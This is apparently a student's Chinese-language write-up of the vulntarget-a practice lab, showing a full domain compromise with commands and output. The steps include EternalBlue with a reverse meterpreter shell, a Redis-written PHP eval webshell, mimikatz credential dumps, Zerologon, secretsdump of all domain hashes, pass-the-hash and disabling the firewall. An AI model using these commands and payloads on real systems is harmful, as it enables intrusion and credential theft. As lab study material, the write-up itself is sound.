vulntarget-a靶场

拓扑结构

中间出现了问题对win7靶机ip进行了调整,调整win7ip:192.168.113.150

域成员-2016

修改网络,加入域就行了。登录的时候记得以域用户的身份登录

账号信息

账号:Administrator

密码:Admin@123

账号:balsec.com\win2016

密码:Admin#123

外围打点

win7设备渗透

首先确认ip地址之后探寻开设的端口

能看到win7开启了4个端口

从445端口渗透

可以发现使用fscan扫描出来了ms17-010漏洞也就是经典的永恒之蓝

那么接下来使用msf进行利用即可

msfconsole —–启动msf

使用use exploit/windows/smb/ms17_010_eternalblue进行漏洞利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
sf > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.40.6
RHOSTS => 192.168.40.6
msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.113.128
[!] Unknown datastore option: LHOSTS. Did you mean RHOSTS?
LHOSTS => 192.168.113.128
msf exploit(windows/smb/ms17_010_eternalblue) > set LPORT 5555
LPORT => 5555
msf exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.113.128:5555 
[*] 192.168.40.6:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.40.6:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.24/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[*] 192.168.40.6:445      - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.40.6:445 - The target is vulnerable.
[*] 192.168.40.6:445 - Connecting to target for exploitation.
[+] 192.168.40.6:445 - Connection established for exploitation.
[+] 192.168.40.6:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.40.6:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.40.6:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes

设置靶机IP地址:set RHOSTS 192.168.40.6
然后设置一下反弹shell的payload:set payload windows/x64/meterpreter/bind_tcp
设置攻击机IP地址:set LHOSTS 192.168.113.128
开始攻击:run

设置端口 :set LPORT 5555

启动shell发现有编码问题CHCP 65001设置一下,其中65001代表UTF-8代码页

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
meterpreter > shell
Process 500 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>ipconfig
ipconfig

Windows IP ����


���������� Bluetooth ��������:

   ý��״  . . . . . . . . . . . . : ý���ѶϿ�
   �����ض��� DNS ��׺ . . . . . . . :

通达oa漏洞利用

可以发现其中部署的服务通达oa系统寻找其漏洞

使用oa-tools进行扫描

上传木马即可

使用工具利用漏洞即可上传木马,之后使用蚁剑连接。

cs上线

上传cs木马到win7

首先建立一个监听器,之后创造一个payload

利用蚁剑上传文件然后执行这个文件即可。

可以看到我们已经上传上去了1.exe文件

在这里遇到了个问题生成载荷之后一直弹不上去,最后发现原因win7靶机需要和kali在同一网络中仅仅是相互能ping通是不行的,最终win7靶机ip:192.168.113.150

弹上去之后可以在cs中进行后续操作。

使用shell +指令进行操作

在cs之中也能很简单的看到win7的明文账号和密码为win7 admin

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Bluetooth ��������:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Ethernet adapter �������� 2:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::c873:12d8:e311:5cc6%13
   IPv4 Address. . . . . . . . . . . : 10.0.20.98
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 

Ethernet adapter ��������:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::a468:7da1:9b41:c7%11
   IPv4 Address. . . . . . . . . . . : 192.168.40.6
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 

Tunnel adapter isatap.{88C7D474-A9AD-4240-ADA1-2ADAD30C0900}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Tunnel adapter isatap.{C16C4D2C-F074-4634-A62D-2B70BC241EE5}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Tunnel adapter isatap.localdomain:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : localdomain

发现了内部还有一个网卡ip为10.0.20.98

1
2
3
C:\Windows\system32>whoami
whoami
nt authority\system

发现权限为system权限

查看进程

tasklist/svc

杀软在线识别-渊龙Sec安全团队

在线杀软识别

image-20260506182106116

无杀毒软件

接下来使用mimikataz模块继续获取更多信息。

mimikataz模块是 Windows 内网渗透里最经典的凭证提取工具之一,核心作用就是:

从内存、系统、票据里“掏”认证信息。

比如:

  • 明文密码
  • NTLM Hash
  • Kerberos 票据
  • 域控凭证
  • Token
  • DPAPI 密钥

执行:

1
sekurlsa::logonpasswords

可以从:

1
lsass.exe

进程里读取登录凭证。

可能看到:

1
2
3
Username : administrator
Password : 123456
NTLM     : xxxxxxxxx

exit退出终端,加载模块

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
C:\Windows\system32>exit
exit
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)

 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz

 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials

msv credentials
===============

Username  Domain   LM                                NTLM                              SHA1

--------  ------   --                                ----                              ----

win7      win7-PC  f0d412bd764ffe81aad3b435b51404ee  209c6174da490caeb422f3fa5a7ae634  7c87541fd3f3ef5016e12d411900c87a6046a8e8

wdigest credentials
===================

Username  Domain     Password

--------  ------     --------

(null)    (null)     (null)
WIN7-PC$  WORKGROUP  (null)
win7      win7-PC    admin

tspkg credentials
=================

Username  Domain   Password

--------  ------   --------

win7      win7-PC  admin

kerberos credentials
====================

Username  Domain     Password

--------  ------     --------

(null)    (null)     (null)
win7      win7-PC    admin
win7-pc$  WORKGROUP  (null)

可以看见win7密码为admin

使用指令为 

1
2
3
load kiwi

creds_all

内网渗透

根据前面收集到的信息win7上有两个网卡,所以需要搭建代理。

Windows Server 2016

前面针对win7进行信息收集时发现了两个网卡,有个内网网段10.0.20.0/24接下来我们对其进行探索。

利用cs的端口扫描功能进行探测,win-2016无法ping不通所以无法使用网络探测而选择端口扫描,使用端口扫描进行信息收集

可以看到10.0.20.99和10.0.20.98两个机器开启的端口服务,10.0.20.98为当前win7主机所以我们就重点关注10.0.20.99这个ip的端口服务,其中开启了两个端口分别是80和5985,但是这个信息应该是不全的于是我们通过蚁剑将fscan上传到win7之中使用指令fscan -h 10.0.20.99 -p all进行一个全端口扫描

fscan扫描出来的内容因为编码问题无法识别扔给ai即可

上传fscan还是太麻烦了于是开始尝试搭建代理来访问靶机的内网。

在 Beacon 里执行:

socks 1080

或者:

socks 1080 socks5 disableNoAuth

成功后:

CS 会在 TeamServer 开一个 SOCKS 代理端口

配置 proxychains(Kali)

编辑:vi /etc/proxychains.conf

最后加:socks5 127.0.0.1 1080(注意cs默认的是socks4所以如果不设置socks5最后应该改成socks4)

最后文件内容应该是

[ProxyList]
socks4 127.0.0.1 1080

之后即可使用kali进行做题

使用namp 进行查询proxychains nmap -Pn -sT 10.0.20.99

proxychains nmap -sT -Pn -p- 10.0.20.99进行全端口扫描(注意搭建的代理必须使用-sT)

image-20260507193942167

我们可以看到信息之中有redis未授权访问也就是说我们可以尝试一下往redis中写入木马来进入win2016机器之中

在kali中执行:proxychains redis-cli -h 10.0.20.99

可以看到成功执行进入redis

1
2
3
4
5
6
7
8
9
10
11
12
13
14
──(root㉿kali)-[/home/…/Desktop/tools/fscan/fscan-main]
└─# proxychains redis-cli -h 10.0.20.99     
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Dynamic chain  ...  127.0.0.1:1080  ...  10.0.20.99:6379  ...  OK
10.0.20.99:6379>  config set dir "C:/phpStudy/PHPTutorial/WWW/"   /**修改 Redis 的持久化文件保存目录**/
OK
10.0.20.99:6379> config set dbfilename tx.php /**修改 Redis 持久化文件名**/
OK
10.0.20.99:6379> set 1 "<?php @eval($_POST['attack']);?>"
OK
10.0.20.99:6379>  save
OK

成功写入webshell,密码为attack

之后使用蚁剑连接即可,注意需要配置代理服务器。

配置好代理后我们可以看到连接成功

这时候证明我们已经打入了win2016这台机器,之后我们只需要将其让cs上上线,这里和win7不通因为win2016无法访问我们的kali,他们不在同一个内网网段之中。

所以我们在这里应该更改一下监听器改成tcp模式的

然后我生成payload,注意在蚁剑中执行的时候需要在win7中进行连接操作

这样就能将win2016上线到cs上

信息收集

我们现在已经将windows server 2016上线到了cs上那么接下来就需要在里面进行一波信息收集探查下信息

使用cs自己的功能抓取hash

1
2
3
Administrator:500:aad3b435b51404eeaad3b435b51404ee:570a9a65db8fba761c1008a51d4c95ab:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

抓取明文密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
[05/07 09:52:55] beacon> logonpasswords
[05/07 09:52:55] [*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[05/07 09:52:55] [+] host called home, sent: 297594 bytes
[05/07 09:52:56] [+] received output:

Authentication Id : 0 ; 1853447 (00000000:001c4807)
Session           : Interactive from 1
User Name         : win2016
Domain            : VULNTARGET
Logon Server      : WIN2019
Logon Time        : 2026/5/7 14:12:27
SID               : S-1-5-21-3795598892-1521228294-2653055093-1601
	msv :	
	 [00000005] Primary
	 * Username : win2016
	 * Domain   : VULNTARGET
	 * NTLM     : dfc8d2bfa540a0a6e2248a82322e654e
	 * SHA1     : cfa10f59337120a5ea6882b11c1c9f451f5f4ea6
	 * DPAPI    : 27bd7cc4802079a6e008ed2d917c4323
	tspkg :	
	wdigest :	
	 * Username : win2016
	 * Domain   : VULNTARGET
	 * Password : (null)
	kerberos :	
	 * Username : win2016
	 * Domain   : VULNTARGET.COM
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 63557 (00000000:0000f845)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2026/5/7 13:16:51
SID               : S-1-5-90-0-1
	msv :	
	 [00000005] Primary
	 * Username : WIN2016$
	 * Domain   : VULNTARGET
	 * NTLM     : 98d18188cf4f0c7391687b03ca3f1138
	 * SHA1     : a58876718d4c88edcf73f2b39d3542c1f753d863
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : VULNTARGET
	 * Password : (null)
	kerberos :	
	 * Username : WIN2016$
	 * Domain   : vulntarget.com
	 * Password : fb e5 c2 66 4c c5 27 8b 84 9d cc 37 36 8d 87 d9 e5 fc 19 31 a4 63 e1 29 de f1 5c 4e c2 53 8e c2 73 af 8f 2d 91 46 db 91 fa d8 6b 36 3f d4 eb e7 45 dc d7 51 f3 c6 36 fd ad b1 07 23 6b b1 11 94 ea 6e 86 a3 ce 66 86 c2 2f fa b7 e2 9c 94 e3 b2 34 be b2 c6 95 4d 87 4c e7 05 44 5a 53 47 ac 69 75 c6 62 c3 c6 fc 15 f1 ee 3d e9 3c 77 c0 08 3c 02 50 d4 1d ea 3c db bb ad b8 0c ce fc 5d 45 53 1d 93 9a 57 87 80 25 00 87 25 a6 ec 4d 8e 2c 50 7d 66 58 1e 19 76 d3 f2 9e 07 48 0b b3 5d 5e 1f a4 bb 50 8b 03 63 37 66 9b dc 19 3a e4 99 be 49 e4 41 e1 52 6f 8d 6f 12 b3 b1 db 48 fe 4a cc ca 66 e3 1a 45 ba 40 15 8f 35 77 52 8d 5a 50 d7 60 5e 95 b5 dd bf b2 e6 5c 94 00 eb 21 81 da 7f 2a 44 59 ec 41 7e 29 ff f2 14 de 02 9a a9 3d 43 0a 
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN2016$
Domain            : VULNTARGET
Logon Server      : (null)
Logon Time        : 2026/5/7 13:16:50
SID               : S-1-5-20
	msv :	
	 [00000005] Primary
	 * Username : WIN2016$
	 * Domain   : VULNTARGET
	 * NTLM     : 98d18188cf4f0c7391687b03ca3f1138
	 * SHA1     : a58876718d4c88edcf73f2b39d3542c1f753d863
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : VULNTARGET
	 * Password : (null)
	kerberos :	
	 * Username : win2016$
	 * Domain   : VULNTARGET.COM
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 40882 (00000000:00009fb2)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2026/5/7 13:16:50
SID               : 
	msv :	
	 [00000005] Primary
	 * Username : WIN2016$
	 * Domain   : VULNTARGET
	 * NTLM     : 98d18188cf4f0c7391687b03ca3f1138
	 * SHA1     : a58876718d4c88edcf73f2b39d3542c1f753d863
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2026/5/7 13:16:51
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 63622 (00000000:0000f886)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2026/5/7 13:16:51
SID               : S-1-5-90-0-1
	msv :	
	 [00000005] Primary
	 * Username : WIN2016$
	 * Domain   : VULNTARGET
	 * NTLM     : 98d18188cf4f0c7391687b03ca3f1138
	 * SHA1     : a58876718d4c88edcf73f2b39d3542c1f753d863
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : VULNTARGET
	 * Password : (null)
	kerberos :	
	 * Username : WIN2016$
	 * Domain   : vulntarget.com
	 * Password : fb e5 c2 66 4c c5 27 8b 84 9d cc 37 36 8d 87 d9 e5 fc 19 31 a4 63 e1 29 de f1 5c 4e c2 53 8e c2 73 af 8f 2d 91 46 db 91 fa d8 6b 36 3f d4 eb e7 45 dc d7 51 f3 c6 36 fd ad b1 07 23 6b b1 11 94 ea 6e 86 a3 ce 66 86 c2 2f fa b7 e2 9c 94 e3 b2 34 be b2 c6 95 4d 87 4c e7 05 44 5a 53 47 ac 69 75 c6 62 c3 c6 fc 15 f1 ee 3d e9 3c 77 c0 08 3c 02 50 d4 1d ea 3c db bb ad b8 0c ce fc 5d 45 53 1d 93 9a 57 87 80 25 00 87 25 a6 ec 4d 8e 2c 50 7d 66 58 1e 19 76 d3 f2 9e 07 48 0b b3 5d 5e 1f a4 bb 50 8b 03 63 37 66 9b dc 19 3a e4 99 be 49 e4 41 e1 52 6f 8d 6f 12 b3 b1 db 48 fe 4a cc ca 66 e3 1a 45 ba 40 15 8f 35 77 52 8d 5a 50 d7 60 5e 95 b5 dd bf b2 e6 5c 94 00 eb 21 81 da 7f 2a 44 59 ec 41 7e 29 ff f2 14 de 02 9a a9 3d 43 0a 
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN2016$
Domain            : VULNTARGET
Logon Server      : (null)
Logon Time        : 2026/5/7 13:16:50
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : VULNTARGET
	 * Password : (null)
	kerberos :	
	 * Username : win2016$
	 * Domain   : VULNTARGET.COM
	 * Password : (null)
	ssp :	
	credman :

可以看见这里的密码是域控随机生成、存储在活动目录中的 256 字节的二进制密钥

shell net time /domain—–使用该指令确定域控名字

shell net time /domain—–获取域控ip

查找域控计算机名 net group "domain controllers" /domain

windows sever 2019

之后上传fscan进行探查

由于编码问题只能让ai解析一下再去看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
Fscan Version: 2.0.1

[2026-05-07 20:44:59] [INFO] 开始信息扫描
[2026-05-07 20:44:59] [INFO] 最终有效主机数量: 1
[2026-05-07 20:44:59] [INFO] 开始主机扫描
[2026-05-07 20:44:59] [INFO] 使用所有可用插件(已排除本地敏感插件)
[2026-05-07 20:44:59] [INFO] 有效端口数量: 233

[2026-05-07 20:45:02] [SUCCESS] 端口开放 10.0.10.110:88
[2026-05-07 20:45:02] [SUCCESS] 端口开放 10.0.10.110:135
[2026-05-07 20:45:02] [SUCCESS] 端口开放 10.0.10.110:139
[2026-05-07 20:45:02] [SUCCESS] 端口开放 10.0.10.110:389
[2026-05-07 20:45:05] [SUCCESS] 端口开放 10.0.10.110:445

[2026-05-07 20:46:08] [INFO] 存活端口数量: 5
[2026-05-07 20:46:08] [INFO] 开始漏洞扫描

[2026-05-07 20:46:08] [SUCCESS] NetBios 10.0.10.110 DC:VULNTARGET\WIN2019

[2026-05-07 20:46:08] [SUCCESS] NetInfo 扫描结果
目标主机: 10.0.10.110
主机名: win2019

发现的网络接口:
   IPv4地址:
      └── 10.0.10.110

[2026-05-07 20:46:53] [SUCCESS] 扫描已完成: 9/9

也没有发现什么有用的信息,那么就搭建代理去使用kali进行操作

之后没有什么别的信息于是怀疑是CVE-2020-1472

参考文章https://www.cnblogs.com/xiaozi/p/13678055.html

判断确实有该漏洞,利用脚本https://github.com/dirkjanm/CVE-2020-1472/blob/master/cve-2020-1472-exploit.py

ok当前域已经被制空了

之后使用proxychains impacket-secretsdump vulntarget.com/win2019$@10.0.10.110 -no-pass -just-dc,这条指令从域控 WIN2019 上“模拟域复制行为”,导出域内所有用户哈希(包括管理员)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(root㉿kali)-[/home/kali/Desktop/CVE-2020-1472]
└─# proxychains impacket-secretsdump vulntarget.com/win2019\$@10.0.10.110 -no-pass -just-dc
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Dynamic chain  ...  127.0.0.1:1082  ...  10.0.10.110:445  ...  OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Dynamic chain  ...  127.0.0.1:1082  ...  10.0.10.110:135  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:1082  ...  10.0.10.110:49667  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:98d18188cf4f0c7391687b03ca3f1138:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
Administrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1
Administrator:des-cbc-md5:dcc29476a789ec9e
krbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311
krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cded
krbtgt:des-cbc-md5:10efae67c7026dbf
vulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61
vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855
vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58
WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390
WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25
WIN2019$:des-cbc-md5:01c8894f541023bc
WIN2016$:aes256-cts-hmac-sha1-96:3f89b35414d6759a26d3d06aa58659ccf7260f87021dbd8434697ada21f90a5a
WIN2016$:aes128-cts-hmac-sha1-96:5856674a0769b6b29551f053cfb933f3
WIN2016$:des-cbc-md5:8f25e602198c8534
[*] Cleaning up...

现在这个域已经被我们拿下来了接下来将win2019上传到cs上完善控制。

看一下上方获取的凭证信息

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::

这条最为关键是管理员凭证,那么我们就可以直接利用该凭证进行登录

1
proxychains impacket-wmiexec vulntarget.com/administrator@10.0.10.110 -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15

这样即可登录成功,然后我们再去cs建立一个新的监听器然后利用smb去上传木马即可

1
proxychains impacket-smbclient vulntarget.com/administrator@10.0.10.110-hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15

之后我们在执行木马之前还需要关闭防火墙

1
2
3
netsh advfirewall show allprofiles # 查看防火墙配置

netSh advfirewall set allprofiles state off # 关闭防火墙

在执行时需要Win2016 Beacon发起正向连接

我们可以看到已经上线成功

接下来看一下cs呈现出的拓扑图是否是正确的

我们可以看到这就是vulntarget-a该靶场的拓扑图,到这里该靶场已经完全被我们拿下来了。

这算是我打的第一个内网靶场,确实在打的过程中学到了很多东西,搭建代理等等的操作都是之前没有了解过的东西以及渗透的思路。学长推荐的这个靶场确实很适合学习,感谢学长在打的过程中给的指导。